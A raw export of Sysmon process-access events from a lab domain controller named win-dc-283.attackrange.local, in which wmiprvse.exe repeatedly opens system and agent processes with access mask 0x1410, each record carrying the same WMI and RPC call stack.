15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022479Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022478Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022477Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022476Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022475Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022474Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022473Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022472Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022471Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022470Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022469Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022468Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022467Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022466Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022465Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022464Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022463Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022462Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022461Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022460Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 